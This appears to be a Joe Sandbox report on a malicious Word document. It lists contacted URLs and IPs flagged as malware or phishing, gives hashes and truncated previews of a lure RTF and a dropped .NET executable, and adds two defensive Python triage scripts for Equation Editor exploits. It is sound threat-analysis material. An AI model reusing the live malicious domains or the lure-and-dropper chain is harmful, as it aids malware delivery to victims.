http://www.furryfriendsupply.storeReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.martline.website/btrd/www.cnoszirzbkaqz.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ngbbvuhkm5.asia/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3 | explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wzxq.xyz | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.380747.netReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.naddafornadda.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.texanboxes.com/btrd/www.outletivo.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.martline.website | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.agriwithai.com/btrd/www.ngbbvuhkm5.asia | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.piriform.com/ccleanerxe | explorer.exe, 0000000D.00000000.402401049.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923839684.000000000260D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.outletivo.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.turbrun.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/server1.crl0 | EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://universalmovies.top/nelb.scrula | EQNEDT32.EXE, 00000009.00000002.398265813.00000000005AF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://www.emeraldsurrogatefabric.com/btrd/www.furryfriendsupply.store | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.furryfriendsupply.store/btrd/www.agriwithai.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.agriwithai.com/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.everslane.com/btrd/www.nvzhuang1.net | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.furryfriendsupply.store/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ngbbvuhkm5.asia | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.outletivo.comReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.onlynaturlpt.shopReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.furryfriendsupply.store | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.naddafornadda.comReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wzxq.xyz/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.naddafornadda.com/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.martline.websiteReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://java.sun.com | explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://universalmovies.top/ | EQNEDT32.EXE, 00000009.00000002.398265813.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, universalmovies.top.url.0.dr | true | Avira URL Cloud: phishing | unknown
https://universalmovies.top/nelb.scriiC: | EQNEDT32.EXE, 00000009.00000002.398265813.00000000005AF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://www.everslane.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 0000000D.00000000.403393890.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003D38000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.402401049.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007542000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.00000000074EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923839684.000000000260D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.texanboxes.comReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.emeraldsurrogatefabric.com/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wirewizardselectric.net/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.onlynaturlpt.shop | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.380747.net/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleaner | explorer.exe, 0000000D.00000000.403393890.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003D38000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.402401049.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007542000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.00000000074EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923839684.000000000260D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.turbrun.com/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wirewizardselectric.net | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wirewizardselectric.net/btrd/www.martline.website | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org | explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://google.com | explorer.exe, 0000000D.00000002.924636332.000000000898F000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 0000000E.00000002.923772394.0000000002A1F000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://secure.comodo.com/CPS0 | EQNEDT32.EXE, 00000009.00000002.398265813.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.entrust.net/2048ca.crl0 | EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.380747.net | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cnoszirzbkaqz.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.everslane.com/btrd/ | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.agriwithai.comReferer: | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.naddafornadda.com/btrd/www.turbrun.com | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.onlynaturlpt.shop/btrd/www.wirewizardselectric.net | explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.162.95 | universalmovies.top | United States | 13335 | CLOUDFLARENETUS | true
15.197.148.33 | wirewizardselectric.net | United States | 7430 | TANDEMUS | true
104.21.74.191 | unknown | United States | 13335 | CLOUDFLARENETUS | true
192.243.61.227 | unknown | Dominica | 39572 | ADVANCEDHOSTERS-ASNL | true
104.21.89.47 | www.onlynaturlpt.shop | United States | 13335 | CLOUDFLARENETUS | true
156.241.141.214 | www.380747.net | Seychelles | 137443 | ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | true
167.172.228.26 | cnoszirzbkaqz.com | United States | 14061 | DIGITALOCEAN-ASNUS | true
3.33.130.190 | texanboxes.com | United States | 8987 | AMAZONEXPANSIONGB | true
5.149.161.103 | www.outletivo.com | Poland | 31229 | PL-BEYOND-ASPL | true
                                        IP
                                        192.168.2.255
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1462365
Start date and time: 2024-06-25 15:12:44 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 17
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Order-1351125X.docx.doc
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@10/19@27/10
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 103
• Number of non-executed functions: 120
Cookbook Comments:
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Override analysis time to 79517.8291586324 for current running targets taking high CPU consumption
• Override analysis time to 159035.658317265 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target EQNEDT32.EXE, PID 3156 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Order-1351125X.docx.doc
Time      Type             Description
09:13:55  API Interceptor  59x Sleep call for process: EQNEDT32.EXE modified
09:13:57  API Interceptor  45x Sleep call for process: nelb82019.scr modified
09:13:59  API Interceptor  7919x Sleep call for process: explorer.exe modified
09:14:03  API Interceptor  11804276x Sleep call for process: wlanext.exe modified
Input / Output
URL: Office document
Model: gpt-4o
```json
{
  "riskscore": 0,
  "reasons": "The provided screenshot does not contain any visually prominent buttons or links. The text in the screenshot appears to be a list of items with no indication of urgency or interest. There is no impersonation of well-known brands, and there is no connection between any sense of urgency and a prominent button or link. Therefore, the document does not exhibit characteristics typical of phishing or malicious intent."
}
```
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131072
                                                                              Entropy (8bit):0.025641774504967164
                                                                              Encrypted:false
                                                                              SSDEEP:6:I3DPcJmFXSHvxggLRbJmtYg/thzgNhis7/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPYf/6Y2UJvYg3J/
                                                                              MD5:03FB2889E16E52A751FD331D0BA1FC97
                                                                              SHA1:CBAEBD6367813873583BB2D15CBC3DE46E0157FF
                                                                              SHA-256:AEDF380BA37490F2682BBF8720EE79AEA6C5AB36C72034C648AB7512DDCBE85D
                                                                              SHA-512:88169652782FEFD57BF0AF8D4A1A5EDC25FA8970BF811CBA1DDA554A1C9A8F884D0F737BABBB13931AD8CC1EE04D0CCB4989A7A9C07074B938F3ECCA9A3DB4D3
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:......M.eFy...z.ft...cJ........S,...X.F...Fa.q................................E.M..).Q..................H....E........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Rich Text Format data, version 1
                                                                              Category:dropped
                                                                              Size (bytes):574773
                                                                              Entropy (8bit):3.713042760749409
                                                                              Encrypted:false
                                                                              SSDEEP:6144:dwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAuB+2:dB
                                                                              MD5:6B9167056AF49BF702C833AE4F581EF1
                                                                              SHA1:ED4886D86B8AD96A0A252190705D70E0FAC9289B
                                                                              SHA-256:13BC94A2F39A03F509036FF58462B974C401CAC0DF52CCE22223114F909B2F72
                                                                              SHA-512:4BA4FC52C2ADD76CB58CEC62F9AE608108AA77374C63C4416F4E5C2AC0FC4BF3569F3520E1AC77994842789015C767D3BB2DD1D384221D5FA865AB54BFC51A07
                                                                              Malicious:false
                                                                              Yara Hits:
• Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nelb[1].doc, Author: ditekSHen
                                                                              Reputation:low
                                                                              Preview:{\rtf1..{\*\7bNZnNrrw8Gw4tjQ8OTnXusuSauwGlmKNomDEwVxZX9yvWDpP8OYkoeFUOirZfcI4welD8UJeqYgxujOP1930nOvkovn4Fc1kQjsls45hTGkBvXJdSWvMmO6jGKPmR3fufqCu5XSGp3pdVwidqIrofvw08hMk8EN62jOgdBYsJhZMYCmvZFUQNFa4poIzFPJszC78SHX3L0cNxcd24ATCngCUlTsXgrdjt12GS}..{\496451969please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and co
                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):628736
                                                                              Entropy (8bit):7.397696471881069
                                                                              Encrypted:false
                                                                              SSDEEP:12288:LajzneBoLmk8bLq4xKNhZAb2drAJuU6ljqdLGtierEWhuV:2jznfL/qLxK7ZAbWAJJ6lGdLGtierEJV
                                                                              MD5:607868824F841FF4B6E24E997228D10D
                                                                              SHA1:76A91EE65551D7BABF8799BBECD9E78C44F47787
                                                                              SHA-256:7392B6A710583060D7F5BD8A3A7573FA0F278A543F961057FEC04445D017DE3B
                                                                              SHA-512:99F856165BCDFEAF6EF3E9F34C9D88CB30E3467F238EEF4489ADE96024D57D50DD002DA63E77DFEB82458B084A1535A7392AC159711337B8694E75822033EBC8
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 37%
                                                                              Reputation:low
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S.................0.................. ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......4...4...........................................................&.(......*".......*".(.....*Vs....(....t.........*...}.....(......~5...tL...(....&.(.....*..*.(.........*".s....&*.r...p.4...(?...(%...o@...oA....#..5....(B....0...*....}3....(........{3....X.....}2...*z.(........}6.....}7.....}8...*F.~9...(P....c...*6.~9....(Q...*F.~:...(P....c...*6.~:....(Q...*F.~;...(P....c...*6.~;....(Q...*F.~<...(P........*J.~<.........(R...*F.~=...(P....c...*6.~=....(Q...*F.~>...(P.
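The entry above records the Equation Editor process (EQNEDT32.EXE) writing a PE32 .NET assembly to disk, which is the behaviour behind the "Office equation editor drops PE file" signature: a legacy OLE server that renders equations has no business producing executables. The following is an added example, not Joe Sandbox code and not derived from this sample's binary, showing how a triage script can confirm a dropped file is a PE image, check whether it carries a CLR runtime header (what makes it a ".Net assembly"), and flag any such drop whose writer is EQNEDT32.EXE. The dropped-file events, file paths and the minimal PE header bytes are constructed test input and are labelled as such in the code.

```python
import struct

# Constructed test input: the smallest header layout that is_pe/has_clr_header
# need. It is not an executable, only a header that parses correctly.
def build_minimal_pe(dotnet: bool) -> bytes:
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF header: Machine=i386, 1 section, no timestamp/symbols,
    # SizeOfOptionalHeader=224 (PE32), Characteristics=EXECUTABLE|32BIT
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    # PE32 optional header: magic 0x10B, 94 bytes of standard/NT fields we do
    # not care about, then 16 data directory entries (RVA, size)
    opt = struct.pack("<H", 0x10B) + b"\x00" * 94
    dirs = [(0, 0)] * 16
    if dotnet:
        dirs[14] = (0x2008, 0x48)  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = CLR header
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    assert len(opt) == 224
    return dos + b"PE\x00\x00" + coff + opt


def _pe_offsets(data: bytes):
    """Return (e_lfanew, optional_header_offset) or None if not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    return e_lfanew, e_lfanew + 4 + 20  # signature + COFF header


def is_pe(data: bytes) -> bool:
    return _pe_offsets(data) is not None


def has_clr_header(data: bytes) -> bool:
    """True if data directory 14 (COM descriptor) is populated, i.e. a .NET image."""
    offs = _pe_offsets(data)
    if offs is None:
        return False
    _, opt_off = offs
    if opt_off + 2 > len(data):
        return False
    magic = struct.unpack_from("<H", data, opt_off)[0]
    # Data directories start at +96 for PE32 (0x10B) and +112 for PE32+ (0x20B)
    dir_base = {0x10B: 96, 0x20B: 112}.get(magic)
    if dir_base is None:
        return False
    entry = opt_off + dir_base + 14 * 8
    if entry + 8 > len(data):
        return False
    rva, size = struct.unpack_from("<II", data, entry)
    return rva != 0 and size != 0


EQUATION_EDITOR = "eqnedt32.exe"

def flag_equation_editor_drops(events):
    """events: dicts with 'process' (writer image path), 'path', 'data' (file bytes)."""
    findings = []
    for ev in events:
        writer = ev["process"].rsplit("\\", 1)[-1].lower()
        if writer != EQUATION_EDITOR:
            continue
        if is_pe(ev["data"]):
            findings.append({"path": ev["path"], "dotnet": has_clr_header(ev["data"])})
    return findings


# Constructed dropped-file events; the output paths are hypothetical.
SAMPLE_EVENTS = [
    {"process": "C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE",
     "path": "C:\\Users\\user\\AppData\\Roaming\\example.exe",
     "data": build_minimal_pe(dotnet=True)},
    {"process": "C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE",
     "path": "C:\\Users\\user\\AppData\\Local\\Temp\\example.rtf",
     "data": b"{\\rtf1\\ansi Hello}"},
    {"process": "C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE",
     "path": "C:\\Users\\user\\AppData\\Local\\Temp\\notes.txt",
     "data": b"plain text, not a PE"},
]

if __name__ == "__main__":
    for f in flag_equation_editor_drops(SAMPLE_EVENTS):
        print(f"EQNEDT32.EXE dropped PE {f['path']} (.NET={f['dotnet']})")
```

Matching on the writer's image name alone is a coarse first filter; in a real pipeline the same check belongs on any Office child process that should never emit executables, and the CLR-header test is what distinguishes a managed loader like the one seen here from a native dropper.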
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Rich Text Format data, version 1
                                                                              Category:dropped
                                                                              Size (bytes):574773
                                                                              Entropy (8bit):3.713042760749409
                                                                              Encrypted:false
                                                                              SSDEEP:6144:dwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAuB+2:dB
                                                                              MD5:6B9167056AF49BF702C833AE4F581EF1
                                                                              SHA1:ED4886D86B8AD96A0A252190705D70E0FAC9289B
                                                                              SHA-256:13BC94A2F39A03F509036FF58462B974C401CAC0DF52CCE22223114F909B2F72
                                                                              SHA-512:4BA4FC52C2ADD76CB58CEC62F9AE608108AA77374C63C4416F4E5C2AC0FC4BF3569F3520E1AC77994842789015C767D3BB2DD1D384221D5FA865AB54BFC51A07
                                                                              Malicious:false
                                                                              Yara Hits:
• Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\497AF0F0.doc, Author: ditekSHen
                                                                              Reputation:low
                                                                              Preview:{\rtf1..{\*\7bNZnNrrw8Gw4tjQ8OTnXusuSauwGlmKNomDEwVxZX9yvWDpP8OYkoeFUOirZfcI4welD8UJeqYgxujOP1930nOvkovn4Fc1kQjsls45hTGkBvXJdSWvMmO6jGKPmR3fufqCu5XSGp3pdVwidqIrofvw08hMk8EN62jOgdBYsJhZMYCmvZFUQNFa4poIzFPJszC78SHX3L0cNxcd24ATCngCUlTsXgrdjt12GS}..{\496451969please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and co
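The two RTF entries above (the template fetched into Content.IE5 and its copy in Content.MSO) are the same file: identical hashes and the same Yara hit on an RTF carrying embedded OLE objects, which is the stage that hands control to EQNEDT32.EXE. The following is an added example, not Joe Sandbox code and not the ditekSHen rule, showing the checks an analyst would script for such a file: the 8-bit Shannon entropy the report lists, whether the header is the standard `{\rtf1` (Word's parser also accepts truncated headers such as `{\rt`, which is why sandboxes flag non-standard versions), which `\obj*` control words are present, and whether any `\objdata` blob or `\objclass` names the Equation Editor (ProgID `Equation.3`, CLSID 0002CE02-0000-0000-C000-000000000046). The RTF fed to it is constructed test input, not this sample's content.

```python
import math
import re
from collections import Counter

# Little-endian byte layout of the Equation Editor CLSID
# {0002CE02-0000-0000-C000-000000000046} as it appears inside OLE structures.
EQUATION_EDITOR_CLSID_LE = bytes.fromhex("02ce020000000000c000000000000046")


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def triage_rtf(data: bytes) -> dict:
    is_rtf = data.startswith(b"{\\rt")
    result = {
        "is_rtf": is_rtf,
        "standard_header": data.startswith(b"{\\rtf1"),
        "entropy": round(shannon_entropy(data), 4),
        "object_control_words": [],
        "object_classes": [],
        "objdata_blobs": 0,
        "equation_editor": False,
    }
    if not is_rtf:
        return result

    # Every \obj* control word present (\objemb, \objupdate, \objdata, ...).
    # \objupdate is worth a closer look: it forces the object to load on open.
    result["object_control_words"] = sorted(
        {m.group(0).decode() for m in re.finditer(rb"\\obj[a-z]+", data)}
    )
    # \objclass carries the ProgID of the embedded object's server.
    result["object_classes"] = [
        m.group(1).decode(errors="replace")
        for m in re.finditer(rb"\\objclass\s+([^\s{}\\]+)", data)
    ]

    # \objdata is a hex dump of an OLE1 stream; decode each blob and look for
    # the Equation Editor by ProgID or CLSID. Whitespace inside the hex is common.
    blobs = []
    for m in re.finditer(rb"\\objdata\s*([0-9A-Fa-f\s]+)", data):
        hexstr = re.sub(rb"\s", b"", m.group(1))
        try:
            blobs.append(bytes.fromhex(hexstr.decode()))
        except ValueError:
            blobs.append(bytes.fromhex(hexstr[: len(hexstr) & ~1].decode()))
    result["objdata_blobs"] = len(blobs)

    result["equation_editor"] = any(
        cls.startswith("Equation") for cls in result["object_classes"]
    ) or any(
        b"Equation.3" in blob or EQUATION_EDITOR_CLSID_LE in blob for blob in blobs
    )
    return result


# Constructed RTF with one embedded Equation.3 object. The \objdata hex is an
# OLE1 header (version, format, class name length) followed by "Equation.3\0".
SAMPLE_RTF = (
    b"{\\rtf1\\ansi\\deff0\n"
    b"{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\n"
    b"{\\*\\objdata 01050000 02000000 0b000000 4571756174696f6e2e3300 }}\n"
    b"Please click Enable editing.}\n"
)

if __name__ == "__main__":
    for key, value in triage_rtf(SAMPLE_RTF).items():
        print(f"{key}: {value}")
```

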